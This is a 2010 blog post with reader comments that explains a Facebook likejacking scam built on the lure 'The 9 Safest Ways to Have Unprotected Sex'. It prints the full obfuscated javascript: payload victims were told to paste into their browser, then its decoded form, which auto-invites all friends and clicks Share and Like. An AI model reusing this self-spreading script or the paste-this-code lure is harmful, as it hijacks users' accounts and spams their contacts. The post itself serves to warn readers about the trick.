People need protection from themselves

It’s amazing how many people fall for scams and social engineering tricks on the internet. Some may remember the classic “I Love you” virus from back at the start of the century: it infected 50 million users within a week or two.  It was actually a very amateurish virus except for one detail: social engineering. The mere name of the attachment was enough to entice people to open and execute the attached script.  Fast forward ten years …………

Ten years later, the year is 2010, and computers are more common place, and generally one would expect people to be more computer savvy.  Yet today on facebook I saw lots of people had clicked on and executed a script from a site talking claiming to have “The 9 Safest Ways to Have Unprotected Sex”. Over a quarter of a million facebook users have fallen to this social engineering. This one is a bit benign, but it’s still social engineering that gets people to execute a script that otherwise wouldn’t be able to.

The site gets people to copy text to the clipboard then paste that in IE’s address bar. The text is :

javascript:(function(){a=’app110142809028483_jop’;b=’app110142809028483_jode’;ifc=’app110142809028483_ifc’; ifo=’app110142809028483_ifo’;mw=’app110142809028483_mwrapper’;var _0xa049=["\x76\x69\x73\x69\x62\x69\x6C\x69\x74\x79","\x73\x74\x79\x6C\x65","\x67\x65\x74\x45\x6C\x65\x6D\x65\x6E\x74\x42\x79\x49\x64","\x68\x69\x64\x64\x65\x6E","\x69\x6E\x6E\x65\x72\x48\x54\x4D\x4C","\x76\x61\x6C\x75\x65","\x63\x6C\x69\x63\x6B","\x73\x75\x67\x67\x65\x73\x74","\x73\x65\x6C\x65\x63\x74\x5F\x61\x6C\x6C","\x73\x67\x6D\x5F\x69\x6E\x76\x69\x74\x65\x5F\x66\x6F\x72\x6D","\x2F\x61\x6A\x61\x78\x2F\x73\x6F\x63\x69\x61\x6C\x5F\x67\x72\x61\x70\x68\x2F\x69\x6E\x76\x69\x74\x65\x5F\x64\x69\x61\x6C\x6F\x67\x2E\x70\x68\x70","\x73\x75\x62\x6D\x69\x74\x44\x69\x61\x6C\x6F\x67","\x73\x6C\x69\x6E\x6B","\x69\x6E\x70\x75\x74","\x67\x65\x74\x45\x6C\x65\x6D\x65\x6E\x74\x73\x42\x79\x54\x61\x67\x4E\x61\x6D\x65","\x53\x68\x61\x72\x65","\x6C\x69\x6B\x65\x6D\x65"];d=document;d[_0xa049[2]](mw)[_0xa049[1]][_0xa049[0]]=_0xa049[3];d[_0xa049[2]](a)[_0xa049[4]]=d[_0xa049[2]](b)[_0xa049[5]];d[_0xa049[2]](_0xa049[7])[_0xa049[6]]();setTimeout(function (){fs[_0xa049[8]]();} ,5000);setTimeout(function (){SocialGraphManager[_0xa049[11]](_0xa049[9],_0xa049[10]);setTimeout(function (){d[_0xa049[2]](_0xa049[12])[_0xa049[6]]();setTimeout(function (){inp=document[_0xa049[14]](_0xa049[13]);for(i in inp){if(inp[i][_0xa049[5]]==_0xa049[15]){inp[i][_0xa049[6]]();} ;} ;setTimeout(function (){d[_0xa049[2]](_0xa049[16])[_0xa049[6]]();d[_0xa049[2]](ifo)[_0xa049[4]]=d[_0xa049[2]](ifc)[_0xa049[5]];} ,5000);} ,3000);} ,3000);} ,5000);})();

 

Which basically translates to :

 

javascript:(function(){
a=’app110142809028483_jop’;
b=’app110142809028483_jode’;
ifc=’app110142809028483_ifc’;
ifo=’app110142809028483_ifo’;
mw=’app110142809028483_mwrapper’;
d=document;
d["getElementById"](mw)["style"]["visibility"]= "hidden";
d["getElementById"](a)["innerHTML"]=d["getElementById"](b)["value"];
d["getElementById"]("suggest")["click"]();
setTimeout(function (){fs["select_all"]();} ,5000);
setTimeout(function (){SocialGraphManager["submitDialog"]("sgm_invite_form","/ajax/social_graph/invite_dialog.php");
   setTimeout(function (){d["getElementById"]("slink")["click"]();
   setTimeout(function (){inp=document["getElementsByTagName"]("input");
   for(i in inp){if(inp[i]["value"]=="Share"){inp[i]["click"]();} ;} ;
   setTimeout(function (){d["getElementById"]("likeme")["click"]();
   d["getElementById"](ifo)["innerHTML"]=d["getElementById"](ifc)["value"];}
,5000);} ,3000);} ,3000);} ,5000);
})();

 

In that script it has timeouts that click on buttons, hence getting people to suggest it to other people, liking it, etc. without the person actually explicitly clicking on the submit buttons.

It’s classic social engineering, and people still fall for it. Oh wait … it’s facebook 😉



2 Comments so far

  1.   bill on May 12th, 2010          

    in the aove where it says BLOCKED SCRIPT that would read
    j a v a s c r i p t :
    without the spaces. My blog host doesn’t allow that kind of crap 😉

  2.   Mike on July 6th, 2010          

    Good post! Found another one, “99% of people can’t watch this video more than 25 seconds”. Has over HALF A MILLION ‘likes’. Same code, as far as I can tell (I’m not this kind of programmer, but the request to cut&paste java script, and the embedded hex chars caught my eye).

    Unfortunately, FB is pretty weak in real security. We’re not far from the point where the bad people figure out how to hijack everything without asking you to cut&paste…